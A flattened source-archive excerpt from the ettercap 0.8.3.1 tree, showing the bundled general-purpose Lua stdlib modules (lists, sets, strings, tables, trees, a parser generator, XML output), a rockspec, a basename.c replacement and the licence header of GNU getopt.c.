#m) do if l[i] < m[i] then return -1 elseif l[i] > m[i] then return 1 end end if #l < #m then return -1 elseif #l > #m then return 1 end return 0 end -- Methods for lists local methods = { append = append, compare = compare, concat = concat, cons = cons, depair = depair, elems = elems, filter = function (self, p) return filter (p, self) end, flatten = flatten, foldl = function (self, f, e) return foldl (f, e, self) end, foldr = function (self, f, e) return foldr (f, e, self) end, indexKey = function (self, f) return indexKey (self, f) end, indexValue = function (self, f) return indexValue (self, f) end, map = function (self, f) return map (f, self) end, mapWith = function (self, f) return mapWith (f, self) end, project = function (self, f) return project (f, self) end, relems = relems, rep = rep, reverse = reverse, shape = function (self, s) return shape (s, self) end, sub = sub, tail = tail, transpose = transpose, zipWith = function (self, f) return zipWith (f, self) end, } -- Metamethods for lists local metatable = { -- list .. table = list.concat __concat = concat, -- list == list retains its referential meaning -- list < list = list.compare returns < 0 __lt = function (l, m) return compare (l, m) < 0 end, -- list <= list = list.compare returns <= 0 __le = function (l, m) return compare (l, m) <= 0 end, __append = append, __index = methods, } --- List constructor. -- Needed in order to use metamethods. -- @param t list (as a table), or nil for empty list -- @return list (with list metamethods) function new (l) return setmetatable (l or {}, metatable) end -- Function forms of operators _G.op[".."] = concat -- Public interface local M = { append = append, compare = compare, concat = concat, cons = cons, depair = depair, elems = elems, enpair = enpair, filter = filter, flatten = flatten, foldl = foldl, foldr = foldr, indexKey = indexKey, indexValue = indexValue, new = new, map = map, mapWith = mapWith, project = project, relems = relems, rep = rep, reverse = reverse, shape = shape, slice = sub, -- backwards compatibility sub = sub, tail = tail, transpose = transpose, zipWith = zipWith, } return M ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/math_ext.lua000664 000000 000000 00000001345 13711276346 024772 0ustar00rootroot000000 000000 --- Additions to the math module. module ("math", package.seeall) local _floor = floor --- Extend math.floor to take the number of decimal places. -- @param n number -- @param p number of decimal places to truncate to (default: 0) -- @return n truncated to p decimal places function floor (n, p) if p and p ~= 0 then local e = 10 ^ p return _floor (n * e) / e else return _floor (n) end end --- Round a number to a given number of decimal places -- @param n number -- @param p number of decimal places to round to (default: 0) -- @return n rounded to p decimal places function round (n, p) local e = 10 ^ (p or 0) return _floor (n * e + 0.5) / e end ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/mbox.lua000664 000000 000000 00000002532 13711276346 024125 0ustar00rootroot000000 000000 --- mbox parser. -- Based on code by Diego Nahab. local function headers (s) local header = {} s = "\n" .. s .. "$$$:\n" local i, j = 1, 1 while true do j = string.find (s, "\n%S-:", i + 1) if not j then break end local _, _, name, val = string.find (string.sub (s, i + 1, j - 1), "(%S-):(.*)") val = string.gsub (val or "", "\r\n", "\n") val = string.gsub (val, "\n%s*", " ") name = string.lower (name) if header[name] then header[name] = header[name] .. ", " .. val else header[name] = val end i, j = j, i end header["$$$"] = nil return header end local function message (s) s = string.gsub (s, "^.-\n", "") local _, s, body _, _, s, body = string.find(s, "^(.-\n)\n(.*)") return {header = headers (s or ""), body = body or ""} end --- Parse a mailbox into messages. -- @param s mailbox as a string -- @return list of messages, each of form {header = {...}, body = "..."} local function parse (s) local mbox = {} s = "\n" .. s .. "\nFrom " local i, j = 1, 1 while true do j = string.find (s, "\nFrom ", i + 1) if not j then break end table.insert (mbox, message (string.sub (s, i + 1, j - 1))) i, j = j, i end return mbox end -- Public interface local M = { parse = parse, } return M ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/modules.lua000664 000000 000000 00000000301 13711276346 024620 0ustar00rootroot000000 000000 return { "debug_init", --"strict", "base", "package_ext", "debug_ext", "table_ext", "list", "tree", "string_ext", "math_ext", "io_ext", "getopt", "set", "strbuf", } ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/object.lua000664 000000 000000 00000003567 13711276346 024437 0ustar00rootroot000000 000000 --- Prototype-based objects --
    --
  • Create an object/class:
    • --
      --
    • Either, if the _init field is a list: --
        --
      • object/Class = prototype {value, ...; field = value, ...}
        • --
      • Named values are assigned to the corresponding fields, and unnamed values -- to the fields given by _init.
        • --
      --
    • Or, if the _init field is a function: --
        --
      • object/Class = prototype (value, ...)
        • --
      • The given values are passed as arguments to the _init function.
        • --
      --
    • An object's metatable is itself.
      • --
    • Private fields and methods start with "_".
      • --
    --
  • Access an object field: object.field
    • --
  • Call an object method: object:method (...)
    • --
  • Call a class method: Class.method (object, ...)
    • --
  • Add a field: object.field = x
    • --
  • Add a method: function object:method (...) ... end
    • -- require "table_ext" --- Root object -- @class table -- @name Object -- @field _init constructor method or list of fields to be initialised by the -- constructor -- @field _clone object constructor which provides the behaviour for _init -- documented above local Object = { _init = {}, _clone = function (self, ...) local object = table.clone (self) if type (self._init) == "table" then table.merge (object, table.clone_rename (self._init, ...)) else object = self._init (object, ...) end return setmetatable (object, object) end, -- Sugar instance creation __call = function (...) -- First (...) gets first element of list return (...)._clone (...) end, } setmetatable (Object, Object) return Object ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/package_ext.lua000664 000000 000000 00000001464 13711276346 025436 0ustar00rootroot000000 000000 -- Additions to the package module. local table_unext = require "table_ext" -- Save original unextended table. local unextended = table.clone (package) --- Make named constants for package.config (undocumented -- in 5.1; see luaconf.h for C equivalents). -- @class table -- @name package -- @field dirsep directory separator -- @field pathsep path separator -- @field path_mark string that marks substitution points in a path template -- @field execdir (Windows only) replaced by the executable's directory in a path -- @field igmark Mark to ignore all before it when building luaopen_ function name. package.dirsep, package.pathsep, package.path_mark, package.execdir, package.igmark = string.match (package.config, "^([^\n]+)\n([^\n]+)\n([^\n]+)\n([^\n]+)\n([^\n]+)") return unextended ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/parser.lua000664 000000 000000 00000021262 13711276346 024455 0ustar00rootroot000000 000000 --- Parser generator. --

    A parser is created by

    --
    --

    p = Parser {grammar}

    --
    --

    and called with

    --
    --

    result = p:parse (start_token, token_list[, -- from])

    --
    --

    where start_token is the non-terminal at which to start parsing -- in the grammar, token_list is a list of tokens of the form

    --
    --

    {ty = "token_type", tok = "token_text"}

    --
    --

    and from is the token in the list from which to start (the -- default value is 1).

    --

    The output of the parser is a tree, each of whose -- nodes is of the form:

    --
    --

    {ty = symbol, node1 = tree1, -- node2 = tree2, ... [, list]}

    --
    --

    where each nodei is a symbolic name, and -- list is the list of trees returned if the corresponding token was a -- list token.

    --

    A grammar is a table of rules of the form

    --
    --

    non-terminal = {production1, -- production2, ...}

    --
    --

    plus a special item

    --
    --

    lexemes = set.new {"class1", "class2", -- ...}

    --
    --

    Each production gives a form that a non-terminal may take. A -- production has the form

    --
    --

    production = {"token1", "token2", -- ..., [action][,abstract]}

    --
    --

    A production

    --
      --
    • must not start with the non-terminal being defined (it must not -- be left-recursive)
      • --
    • must not be a prefix of a later production in the same -- non-terminal
      • --
    --

    Each token may be

    --
      --
    • a non-terminal, i.e. a token defined by the grammar
      • --
        --
      • an optional symbol is indicated by the suffix _opt
        • --
      • a list is indicated by the suffix _list, and may be -- followed by _≤separator-symbol> (default is no separator)
        • --
      --
    • a lexeme class
      • --
    • a string to match literally
      • --
    --

    The parse tree for a literal string or lexeme class is the string -- that was matched. The parse tree for a non-terminal is a table of -- the form

    --
    --

    {ty = "non_terminal_name", tree1, -- tree2, ...}

    --
    --

    where the treei are the parse trees for the -- corresponding terminals and non-terminals.

    --

    An action is of the form

    --
    --

    action = function (tree, token, pos) ... return tree_ -- end

    --
    --

    It is passed the parse tree for the current node, the token list, -- and the current position in the token list, and returns a new parse -- tree.

    --

    An abstract syntax rule is of the form

    --
    --

    name = {i1, i2, ...}

    --
    --

    where i1, i2, -- ... are numbers. This results in a parse tree of the form

    --
    --

    {ty = "name"; treei1, -- treei2, ...}

    --
    --

    If a production has no abstract syntax rule, the result is the -- parse node for the current node.

    --

    FIXME: Give lexemes as an extra argument to Parser? --
    FIXME: Rename second argument to parse method to "tokens"? --
    FIXME: Make start_token an optional argument to parse? (swap with -- token list) and have it default to the first non-terminal?

    local Object = require "object" local Parser = Object {_init = {"grammar"}} --- Parser constructor -- @param grammar parser grammar -- @return parser function Parser:_init (grammar) local init = table.clone_rename ({"grammar"}, grammar) -- Reformat the abstract syntax rules for rname, rule in pairs (init.grammar) do if name ~= "lexemes" then for pnum, prod in ipairs (rule) do local abstract for i, v in pairs (prod) do if type (i) == "string" and i ~= "action" then if abstract then die ("more than one abstract rule for " .. rname .. "." .. tostring (pnum)) else if type (v) ~= "table" then die ("bad abstract syntax rule of type " .. type (v)) end abstract = {ty = i, template = v} prod[i] = nil end end end if abstract then prod.abstract = abstract end end end end return table.merge (self, init) end --- Parse a token list. -- @param start the token at which to start -- @param token the list of tokens -- @param from the index of the token to start from (default: 1) -- @return parse tree function Parser:parse (start, token, from) local grammar = self.grammar -- for consistency and brevity local rule, symbol -- functions called before they are defined -- Try to parse an optional symbol. -- @param sym the symbol being tried -- @param from the index of the token to start from -- @return the resulting parse tree, or false if empty -- @return the index of the first unused token, or false to -- indicate failure local function optional (sym, from) local tree, to = symbol (sym, from) if to then return tree, to else return false, from end end -- Try to parse a list of symbols. -- @param sym the symbol being tried -- @param sep the list separator -- @param from the index of the token to start from -- @return the resulting parse tree, or false if empty -- @return the index of the first unused token, or false to -- indicate failure local function list (sym, sep, from) local tree, to tree, from = symbol (sym, from) local list = {tree} if from == false then return list, false end to = from repeat if sep ~= "" then tree, from = symbol (sep, from) end if from then tree, from = symbol (sym, from) if from then table.insert (list, tree) to = from end end until from == false return list, to end -- Try to parse a given symbol. -- @param sym the symbol being tried -- @param from the index of the token to start from -- @return tree the resulting parse tree, or false if empty -- @return the index of the first unused token, or false to -- indicate failure symbol = function (sym, from) -- declared at the top if string.sub (sym, -4, -1) == "_opt" then -- optional symbol return optional (string.sub (sym, 1, -5), from) elseif string.find (sym, "_list.-$") then -- list local _, _, subsym, sep = string.find (sym, "^(.*)_list_?(.-)$") return list (subsym, sep, from) elseif grammar[sym] then -- non-terminal return rule (sym, from) elseif token[from] and -- not end of token list ((grammar.lexemes:member (sym) and sym == token[from].ty) or -- lexeme sym == token[from].tok) -- literal terminal then return token[from].tok, from + 1 -- advance to next token else return false, false end end -- Try a production. -- @param name the name of the current rule -- @param prod the production (list of symbols) being tried -- @param from the index of the token to start from -- @return the parse tree (incomplete if to is false) -- @return the index of the first unused token, or false to -- indicate failure local function production (name, prod, from) local tree = {ty = name} local to = from for prod in _G.list.elems (prod) do local sym sym, to = symbol (prod, to) if to then table.insert (tree, sym) else return tree, false end end if prod.action then tree = prod.action (tree, token, to) end if prod.abstract then local ntree = {} ntree.ty = prod.abstract.ty for i, n in pairs (prod.abstract.template) do ntree[i] = tree[n] end tree = ntree end return tree, to end -- Parse according to a particular rule. -- @param name the name of the rule to try -- @param from the index of the token to start from -- @return parse tree -- @return the index of the first unused token, or false to -- indicate failure rule = function (name, from) -- declared at the top local alt = grammar[name] local tree, to for alt in _G.list.elems (alt) do tree, to = production (name, alt, from) if to then return tree, to end end return tree, false end return rule (start, 1, from or 1) end return Parser ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/set.lua000664 000000 000000 00000007117 13711276346 023757 0ustar00rootroot000000 000000 local list = require "list" -- Primitive methods (know about representation) -- The representation is a table whose tags are the elements, and -- whose values are true. --- Say whether an element is in a set -- @param s set -- @param e element -- @return true if e is in set, false -- otherwise local function member (s, e) return rawget (s.contents, e) == true end --- Insert an element into a set -- @param s set -- @param e element local function insert (s, e) rawset (s.contents, e, true) end --- Delete an element from a set -- @param s set -- @param e element local function delete (s, e) rawset (s.contents, e, nil) end --- Make a list into a set -- @param l list -- @return set local metatable = {} local function new (l) local s = setmetatable ({contents={}}, metatable) for e in list.elems (l) do insert (s, e) end return s end --- Iterator for sets -- TODO: Make the iterator return only the key local function elems (s) return pairs (s.contents) end -- High level methods (representation-independent) local difference, symmetric_difference, intersection, union, subset, equal --- Find the difference of two sets -- @param s set -- @param t set -- @return s with elements of t removed function difference (s, t) local r = new {} for e in elems (s) do if not member (t, e) then insert (r, e) end end return r end --- Find the symmetric difference of two sets -- @param s set -- @param t set -- @return elements of s and t that are in s or t but not both function symmetric_difference (s, t) return difference (union (s, t), intersection (t, s)) end --- Find the intersection of two sets -- @param s set -- @param t set -- @return set intersection of s and t function intersection (s, t) local r = new {} for e in elems (s) do if member (t, e) then insert (r, e) end end return r end --- Find the union of two sets -- @param s set -- @param t set -- @return set union of s and t function union (s, t) local r = new {} for e in elems (s) do insert (r, e) end for e in elems (t) do insert (r, e) end return r end --- Find whether one set is a subset of another -- @param s set -- @param t set -- @return true if s is a subset of t, false -- otherwise function subset (s, t) for e in elems (s) do if not member (t, e) then return false end end return true end --- Find whether one set is a proper subset of another -- @param s set -- @param t set -- @return true if s is a proper subset of t, false otherwise function propersubset (s, t) return subset (s, t) and not subset (t, s) end --- Find whether two sets are equal -- @param s set -- @param t set -- @return true if sets are equal, false -- otherwise function equal (s, t) return subset (s, t) and subset (t, s) end -- Public interface local M = { delete = delete, difference = difference, elems = elems, equal = equal, insert = insert, intersection = intersection, member = member, new = new, subset = subset, symmetric_difference = symmetric_difference, union = union, } --- Metamethods for sets -- set:method () metatable.__index = M -- set + table = union metatable.__add = union -- set - table = set difference metatable.__sub = difference -- set * table = intersection metatable.__mul = intersection -- set / table = symmetric difference metatable.__div = symmetric_difference -- set <= table = subset metatable.__le = subset -- set < table = proper subset metatable.__lt = propersubset return M ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/std.lua.in000664 000000 000000 00000001063 13711276346 024355 0ustar00rootroot000000 000000 --- Lua standard library --
      --
    • TODO: Write a style guide (indenting/wrapping, capitalisation, -- function and variable names); library functions should call -- error, not die; OO vs non-OO (a thorny problem).
      • --
    • TODO: Add tests for each function immediately after the function; -- this also helps to check module dependencies.
      • --
    • TODO: pre-compile.
      • --
    local version = "General Lua libraries / @VERSION@" for _, m in ipairs (require "modules") do _G[m] = require (m) end local M = { version = version, } return M ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/strbuf.lua000664 000000 000000 00000001276 13711276346 024471 0ustar00rootroot000000 000000 --- String buffers --- Create a new string buffer local metatable = {} local function new () return setmetatable ({}, metatable) end --- Add a string to a buffer -- @param b buffer -- @param s string to add -- @return buffer local function concat (b, s) table.insert (b, s) return b end --- Convert a buffer to a string -- @param b buffer -- @return string local function tostring (b) return table.concat (b) end -- Public interface local M = { concat = concat, new = new, tostring = tostring, } --- Metamethods for string buffers -- buffer:method () metatable.__index = M -- buffer .. string metatable.__concat = concat -- tostring metatable.__tostring = tostring return M ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/strict.lua000664 000000 000000 00000002013 13711276346 024462 0ustar00rootroot000000 000000 --- Checks uses of undeclared global variables. -- All global variables must be 'declared' through a regular -- assignment (even assigning nil will do) in a top-level -- chunk before being used anywhere or assigned to inside a function. -- From Lua distribution (etc/strict.lua). -- @class module -- @name strict local getinfo, error, rawset, rawget = debug.getinfo, error, rawset, rawget local mt = getmetatable (_G) if mt == nil then mt = {} setmetatable (_G, mt) end mt.__declared = {} local function what () local d = getinfo (3, "S") return d and d.what or "C" end mt.__newindex = function (t, n, v) if not mt.__declared[n] then local w = what () if w ~= "main" and w ~= "C" then error ("assignment to undeclared variable '" .. n .. "'", 2) end mt.__declared[n] = true end rawset (t, n, v) end mt.__index = function (t, n) if not mt.__declared[n] and what () ~= "C" then error ("variable '" .. n .. "' is not declared", 2) end return rawget (t, n) end ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/string_ext.lua000664 000000 000000 00000022340 13711276346 025345 0ustar00rootroot000000 000000 --- Additions to the string module -- TODO: Pretty printing (use in getopt); see source for details. require "table_ext" local list = require "list" local strbuf = require "strbuf" -- Write pretty-printing based on: -- -- John Hughes's and Simon Peyton Jones's Pretty Printer Combinators -- -- Based on "The Design of a Pretty-printing Library in Advanced -- Functional Programming", Johan Jeuring and Erik Meijer (eds), LNCS 925 -- http://www.cs.chalmers.se/~rjmh/Papers/pretty.ps -- Heavily modified by Simon Peyton Jones, Dec 96 -- -- Haskell types: -- data Doc list of lines -- quote :: Char -> Char -> Doc -> Doc Wrap document in ... -- (<>) :: Doc -> Doc -> Doc Beside -- (<+>) :: Doc -> Doc -> Doc Beside, separated by space -- ($$) :: Doc -> Doc -> Doc Above; if there is no overlap it "dovetails" the two -- nest :: Int -> Doc -> Doc Nested -- punctuate :: Doc -> [Doc] -> [Doc] punctuate p [d1, ... dn] = [d1 <> p, d2 <> p, ... dn-1 <> p, dn] -- render :: Int Line length -- -> Float Ribbons per line -- -> (TextDetails -> a -> a) What to do with text -- -> a What to do at the end -- -> Doc The document -- -> a Result --- Give strings a subscription operator. -- @param s string -- @param i index -- @return string.sub (s, i, i) if i is a number, or -- falls back to any previous metamethod (by default, string methods) local old__index = getmetatable ("").__index getmetatable ("").__index = function (s, i) if type (i) == "number" then return s:sub (i, i) -- Fall back to old metamethods elseif type (old__index) == "function" then return old__index (s, i) else return old__index[i] end end --- Give strings an append metamethod. -- @param s string -- @param c character (1-character string) -- @return s .. c getmetatable ("").__append = function (s, c) return s .. c end --- Give strings a concat metamethod. -- @param s string -- @param o object -- @return s .. tostring (o) getmetatable ("").__concat = function (s, o) return tostring (s) .. tostring (o) end --- Capitalise each word in a string. -- @param s string -- @return capitalised string local function caps (s) return (string.gsub (s, "(%w)([%w]*)", function (l, ls) return string.upper (l) .. ls end)) end --- Remove any final newline from a string. -- @param s string to process -- @return processed string local function chomp (s) return (string.gsub (s, "\n$", "")) end --- Escape a string to be used as a pattern -- @param s string to process -- @return -- @param s_: processed string local function escape_pattern (s) return (string.gsub (s, "(%W)", "%%%1")) end -- Escape a string to be used as a shell token. -- Quotes spaces, parentheses, brackets, quotes, apostrophes and -- whitespace. -- @param s string to process -- @return processed string local function escape_shell (s) return (string.gsub (s, "([ %(%)%\\%[%]\"'])", "\\%1")) end --- Return the English suffix for an ordinal. -- @param n number of the day -- @return suffix local function ordinal_suffix (n) n = math.abs (n) % 100 local d = n % 10 if d == 1 and n ~= 11 then return "st" elseif d == 2 and n ~= 12 then return "nd" elseif d == 3 and n ~= 13 then return "rd" else return "th" end end --- Extend to work better with one argument. -- If only one argument is passed, no formatting is attempted. -- @param f format -- @param ... arguments to format -- @return formatted string local _format = string.format local function format (f, arg1, ...) if arg1 == nil then return f else return _format (f, arg1, ...) end end --- Justify a string. -- When the string is longer than w, it is truncated (left or right -- according to the sign of w). -- @param s string to justify -- @param w width to justify to (-ve means right-justify; +ve means -- left-justify) -- @param p string to pad with (default: " ") -- @return justified string local function pad (s, w, p) p = string.rep (p or " ", math.abs (w)) if w < 0 then return string.sub (p .. s, w) end return string.sub (s .. p, 1, w) end --- Wrap a string into a paragraph. -- @param s string to wrap -- @param w width to wrap to (default: 78) -- @param ind indent (default: 0) -- @param ind1 indent of first line (default: ind) -- @return wrapped paragraph local function wrap (s, w, ind, ind1) w = w or 78 ind = ind or 0 ind1 = ind1 or ind assert (ind1 < w and ind < w, "the indents must be less than the line width") assert (type (s) == "string", "bad argument #1 to 'wrap' (string expected, got " .. type (s) .. ")") local r = strbuf.new ():concat (string.rep (" ", ind1)) local i, lstart, len = 1, ind1, #s while i <= #s do local j = i + w - lstart while #s[j] > 0 and s[j] ~= " " and j > i do j = j - 1 end local ni = j + 1 while s[j] == " " do j = j - 1 end r:concat (s:sub (i, j)) i = ni if i < #s then r:concat ("\n" .. string.rep (" ", ind)) lstart = ind end end return r:tostring () end --- Write a number using SI suffixes. -- The number is always written to 3 s.f. -- @param n number -- @return string local function numbertosi (n) local SIprefix = { [-8] = "y", [-7] = "z", [-6] = "a", [-5] = "f", [-4] = "p", [-3] = "n", [-2] = "mu", [-1] = "m", [0] = "", [1] = "k", [2] = "M", [3] = "G", [4] = "T", [5] = "P", [6] = "E", [7] = "Z", [8] = "Y" } local t = string.format("% #.2e", n) local _, _, m, e = t:find(".(.%...)e(.+)") local man, exp = tonumber (m), tonumber (e) local siexp = math.floor (exp / 3) local shift = exp - siexp * 3 local s = SIprefix[siexp] or "e" .. tostring (siexp) man = man * (10 ^ shift) return tostring (man) .. s end --- Do find, returning captures as a list. -- @param s target string -- @param p pattern -- @param init start position (default: 1) -- @param plain inhibit magic characters (default: nil) -- @return start of match, end of match, table of captures local function tfind (s, p, init, plain) assert (type (s) == "string", "bad argument #1 to 'tfind' (string expected, got " .. type (s) .. ")") assert (type (p) == "string", "bad argument #2 to 'tfind' (string expected, got " .. type (p) .. ")") local function pack (from, to, ...) return from, to, {...} end return pack (p.find (s, p, init, plain)) end --- Do multiple finds on a string. -- @param s target string -- @param p pattern -- @param init start position (default: 1) -- @param plain inhibit magic characters (default: nil) -- @return list of {from, to; capt = {captures}} local function finds (s, p, init, plain) init = init or 1 local l = {} local from, to, r repeat from, to, r = tfind (s, p, init, plain) if from ~= nil then table.insert (l, {from, to, capt = r}) init = to + 1 end until not from return l end --- Split a string at a given separator. -- FIXME: Consider Perl and Python versions. -- @param s string to split -- @param sep separator pattern -- @return list of strings local function split (s, sep) -- finds gets a list of {from, to, capt = {}} lists; we then -- flatten the result, discarding the captures, and prepend 0 (1 -- before the first character) and append 0 (1 after the last -- character), and then read off the result in pairs. local pairs = list.concat ({0}, list.flatten (finds (s, sep)), {0}) local l = {} for i = 1, #pairs, 2 do table.insert (l, string.sub (s, pairs[i] + 1, pairs[i + 1] - 1)) end return l end --- Remove leading matter from a string. -- @param s string -- @param r leading pattern (default: "%s+") -- @return string without leading r local function ltrim (s, r) r = r or "%s+" return (string.gsub (s, "^" .. r, "")) end --- Remove trailing matter from a string. -- @param s string -- @param r trailing pattern (default: "%s+") -- @return string without trailing r local function rtrim (s, r) r = r or "%s+" return (string.gsub (s, r .. "$", "")) end --- Remove leading and trailing matter from a string. -- @param s string -- @param r leading/trailing pattern (default: "%s+") -- @return string without leading/trailing r local function trim (s, r) return rtrim (ltrim (s, r), r) end -- Save original unextended table. local unextended = table.clone (string) local M = { __index = old__index, caps = caps, chomp = chomp, escape_pattern = escape_pattern, escape_shell = escape_shell, finds = finds, format = format, ltrim = ltrim, numbertosi = numbertosi, ordinal_suffix = ordinal_suffix, pad = pad, rtrim = rtrim, split = split, tfind = tfind, trim = trim, wrap = wrap, -- camelCase compatibility: escapePattern = escape_pattern, escapeShell = escape_shell, ordinalSuffix = ordinal_suffix, } -- Inject stdlib extensions directly into the string package. _G.string = table.merge (string, M) return unextended ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/table_ext.lua000664 000000 000000 00000005675 13711276346 025142 0ustar00rootroot000000 000000 -- Extensions to the table module --local list = require "list" FIXME: allow require loops local _sort = table.sort --- Make table.sort return its result. -- @param t table -- @param c comparator function -- @return sorted table local function sort (t, c) _sort (t, c) return t end --- Return whether table is empty. -- @param t table -- @return true if empty or false otherwise local function empty (t) return not next (t) end --- Find the number of elements in a table. -- @param t table -- @return number of elements in t local function size (t) local n = 0 for _ in pairs (t) do n = n + 1 end return n end --- Make the list of keys of a table. -- @param t table -- @return list of keys local function keys (t) local u = {} for i, v in pairs (t) do table.insert (u, i) end return u end --- Make the list of values of a table. -- @param t table -- @return list of values local function values (t) local u = {} for i, v in pairs (t) do table.insert (u, v) end return u end --- Invert a table. -- @param t table {i=v, ...} -- @return inverted table {v=i, ...} local function invert (t) local u = {} for i, v in pairs (t) do u[v] = i end return u end --- Make a shallow copy of a table, including any metatable (for a -- deep copy, use tree.clone). -- @param t table -- @param nometa if non-nil don't copy metatable -- @return copy of table local function clone (t, nometa) local u = {} if not nometa then setmetatable (u, getmetatable (t)) end for i, v in pairs (t) do u[i] = v end return u end --- Clone a table, renaming some keys. -- @param map table {old_key=new_key, ...} -- @param t table to copy -- @return copy of table local function clone_rename (map, t) local r = clone (t) for i, v in pairs (map) do r[v] = t[i] r[i] = nil end return r end --- Merge one table into another. u is merged into t. -- @param t first table -- @param u second table -- @return first table local function merge (t, u) for i, v in pairs (u) do t[i] = v end return t end --- Make a table with a default value for unset keys. -- @param x default entry value (default: nil) -- @param t initial table (default: {}) -- @return table whose unset elements are x local function new (x, t) return setmetatable (t or {}, {__index = function (t, i) return x end}) end -- Save original unextended table. local unextended = clone (table) local M = { clone = clone, clone_rename = clone_rename, empty = empty, invert = invert, keys = keys, merge = merge, new = new, size = size, sort = sort, values = values, } -- Inject stdlib extensions directly into the table package. _G.table = merge (table, M) return unextended ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/tree.lua000664 000000 000000 00000004504 13711276346 024120 0ustar00rootroot000000 000000 --- Tables as trees. local list = require "list" local metatable = {} --- Make a table into a tree -- @param t table -- @return tree local function new (t) return setmetatable (t or {}, metatable) end --- Tree __index metamethod. -- @param tr tree -- @param i non-table, or list of keys {i1 ... -- in} -- @return tr[i]...[in] if i is a table, or -- tr[i] otherwise function metatable.__index (tr, i) -- FIXME: the following doesn't treat list keys correctly -- e.g. tr[{{1, 2}, {3, 4}}], maybe flatten first? if type (i) == "table" and #i > 0 then return list.foldl (op["[]"], tr, i) else return rawget (tr, i) end end --- Tree __newindex metamethod. -- Sets tr[i1]...[in] = v if i is a -- table, or tr[i] = v otherwise -- @param tr tree -- @param i non-table, or list of keys {i1 ... -- in} -- @param v value function metatable.__newindex (tr, i, v) if type (i) == "table" then for n = 1, #i - 1 do if getmetatable (tr[i[n]]) ~= metatable then rawset (tr, i[n], new ()) end tr = tr[i[n]] end rawset (tr, i[#i], v) else rawset (tr, i, v) end end --- Make a deep copy of a tree, including any metatables -- @param t table -- @param nometa if non-nil don't copy metatables -- @return copy of table local function clone (t, nometa) local r = {} if not nometa then setmetatable (r, getmetatable (t)) end local d = {[t] = r} local function copy (o, x) for i, v in pairs (x) do if type (v) == "table" then if not d[v] then d[v] = {} if not nometa then setmetatable (d[v], getmetatable (v)) end o[i] = copy (d[v], v) else o[i] = d[v] end else o[i] = v end end return o end return copy (r, t) end --- Deep-merge one tree into another. u is merged into --- t. -- @param t first tree -- @param u second tree -- @return first tree local function merge (t, u) for ty, p, n in nodes (u) do if ty == "leaf" then t[p] = n end end return t end -- Public interface local M = { clone = clone, merge = merge, new = new, } return M ettercap-0.8.3.1/src/lua/share/third-party/stdlib/src/xml.lua000664 000000 000000 00000005343 13711276346 023763 0ustar00rootroot000000 000000 -- XML extensions to string module. -- @class module -- @name xml require "base" require "string_ext" --- Write a table as XML. -- The input format is assumed to be that output by luaexpat. -- @param t table to print. -- In each element, tag is its name, attr is the table of attributes, -- and the sub-elements are held in the integer keys -- @param indent indent between levels (default: "\t") -- @param spacing space before every line -- @returns XML string function string.writeXML (t, indent, spacing) indent = indent or "\t" spacing = spacing or "" return render (t, function (x) spacing = spacing .. indent if x.tag then local s = "<" .. x.tag if type (x.attr) == "table" then for i, v in pairs (x.attr) do if type (i) ~= "number" then -- luaexpat gives names of attributes in list elements s = s .. " " .. tostring (i) .. "=" .. string.format ("%q", tostring (v)) end end end if #x == 0 then s = s .. " /" end s = s .. ">" return s end return "" end, function (x) spacing = string.gsub (spacing, indent .. "$", "") if x.tag and #x > 0 then return spacing .. "" end return "" end, function (s) s = tostring (s) s = string.gsub (s, "&([%S]+)", function (s) if not string.match (s, "^#?%w+;") then return "&" .. s else return "&" .. s end end) s = string.gsub (s, "<", "<") s = string.gsub (s, ">", ">") return s end, function (x, i, v, is, vs) local s = "" if type (i) == "number" then s = spacing .. vs end return s end, function (_, i, _, j) if type (i) == "number" or type (j) == "number" then return "\n" end return "" end) end ettercap-0.8.3.1/src/lua/share/third-party/stdlib/stdlib.rockspec.in000664 000000 000000 00000001375 13711276346 025313 0ustar00rootroot000000 000000 package="stdlib" version="@VERSION@-1" source = { url = "git://github.com/rrthomas/lua-stdlib.git", branch = "release-v@VERSION@", } description = { summary = "General Lua libraries", detailed = [[ stdlib is a library of modules for common programming tasks, including list, table and functional operations, regexps, objects, pickling, pretty-printing and getopt. ]], homepage = "http://github.com/rrthomas/lua-stdlib/", license = "MIT/X11" } dependencies = { "lua >= @LUA_MIN_VERSION@" } build = { type = "command", build_command = "LUA=$(LUA) CPPFLAGS=-I$(LUA_INCDIR) ./configure --prefix=$(PREFIX) --libdir=$(LIBDIR) --datadir=$(LUADIR) && make clean && make", install_command = "make install", copy_directories = {} } ettercap-0.8.3.1/src/lua/share/third-party/stdlib/template.lua000664 000000 000000 00000001175 13711276346 024206 0ustar00rootroot000000 000000 #! /usr/bin/env lua prog = { name = arg[0]:gsub ("^.*/", ""),, version = "VERSION (DATE) by AUTHOR )", purpose = "ONE LINE DESCRIPTION OF WHAT THIS PROGRAM DOES", description = "optional longer description of how to use this program", copyright = "Copyright (C) YEAR COPYRIGHT-HOLDER", notes = "Usage footer messasge", } require "std" -- Process a file function main (file, number) end -- Command-line options prog.options = { getopt.Option {{"test", "t"}, "test option"}, } -- Main routine getopt.processArgs (prog) io.processFiles (main) -- Changelog -- 0.1 Program started ettercap-0.8.3.1/src/missing/000775 000000 000000 00000000000 13711276346 015722 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/missing/basename.c000664 000000 000000 00000000307 13711276346 017641 0ustar00rootroot000000 000000 #include char * basename (const char *filename); char * basename (const char *filename) { register char *p; p = strrchr (filename, '/'); return p ? p + 1 : (char *) filename; } ettercap-0.8.3.1/src/missing/getopt.c000664 000000 000000 00000104236 13711276346 017376 0ustar00rootroot000000 000000 /* Getopt for GNU. NOTE: getopt is now part of the C library, so if you don't know what "Keep this file name-space clean" means, talk to drepper@gnu.org before changing it! Copyright (C) 1987, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 2000 Free Software Foundation, Inc. The GNU C Library is free software; you can redistribute it and/or modify it under the terms of the GNU Library General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. The GNU C Library is distributed in the hope that it will be 